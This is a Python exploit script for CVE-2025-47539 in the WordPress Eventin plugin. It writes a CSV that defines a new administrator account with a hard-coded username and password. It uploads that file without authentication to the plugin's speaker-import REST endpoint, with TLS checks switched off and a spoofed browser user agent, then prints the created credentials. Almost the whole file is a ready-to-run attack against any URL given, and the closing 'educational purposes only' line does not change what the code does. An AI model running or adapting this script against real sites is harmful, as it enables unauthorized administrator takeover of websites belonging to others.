#!/usr/bin/env python3 import argparse import requests import csv import os import sys from urllib.parse import urlparse class Nxploited: def __init__(self, target_url): self.url = self.validate_url(target_url) self.endpoint = "/wp-json/eventin/v2/speakers/import" self.session = self.setup_session() self.headers = {"User-Agent": self.user_agent()} self.csv_file = "user.csv" self.name = "Nxploited (Khaled_alenazi)" self.email = "Nxploit@admin.sa" self.username = "NxPloted" self.password = "nxploit123" self.role = "administrator" def validate_url(self, url): parsed = urlparse(url) if not parsed.scheme: url = f"http://{url}" return url.rstrip('/') def setup_session(self): s = requests.Session() requests.packages.urllib3.disable_warnings() s.verify = False return s def user_agent(self): return "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" def generate_csv(self): data = [[self.name, self.email, self.username, self.password, self.role]] with open(self.csv_file, mode='w', newline='', encoding='utf-8') as f: writer = csv.writer(f) writer.writerow(["name", "email", "username", "password", "role"]) writer.writerows(data) def exploit(self): self.generate_csv() full_url = f"{self.url}{self.endpoint}" files = {"speaker_import": (self.csv_file, open(self.csv_file, "rb"), "text/csv")} try: response = self.session.post(full_url, files=files, headers=self.headers) if "Successfully imported" in response.text: print("[+] Exploitation succeeded") print("[+] Response:") print(response.text.strip()) print("\n[+] Exploited Account Details") print(f" Name : {self.name}") print(f" Email : {self.email}") print(f" Username : {self.username}") print(f" Password : {self.password}") print(f" Role : {self.role}") else: print("[-] Exploitation failed") print(response.text.strip()) except Exception as e: print(f"[-] Error occurred: {e}") def cleanup(self): if os.path.exists(self.csv_file): os.remove(self.csv_file) def print_banner(): banner = r''' ###### ## ## ######## ####### ##### ####### ######## ## ######## ######## ####### ####### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ###### ####### ####### ## ## ####### ####### ####### ## ## ## ####### ####### ######## ## ## ## ## ## ## ## ## ## ######### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ###### ### ######## ######### ##### ######### ###### ## ## ###### ####### ####### ''' print(banner) print("By:Nxploited (Khaled_alenazi) | NxploitBot@gmail.com") def main(): parser = argparse.ArgumentParser(description="Exploit for CVE-2025-47539 # By Nxploited (Khaled Alenazi)") parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g. http://target.com)") args = parser.parse_args() print_banner() tool = Nxploited(args.url) tool.exploit() tool.cleanup() print("\nExploit: By: Nxploited (Khaled_alenazi)") print("Use this script for educational purposes only. I am not responsible for your actions.") if __name__ == "__main__": main()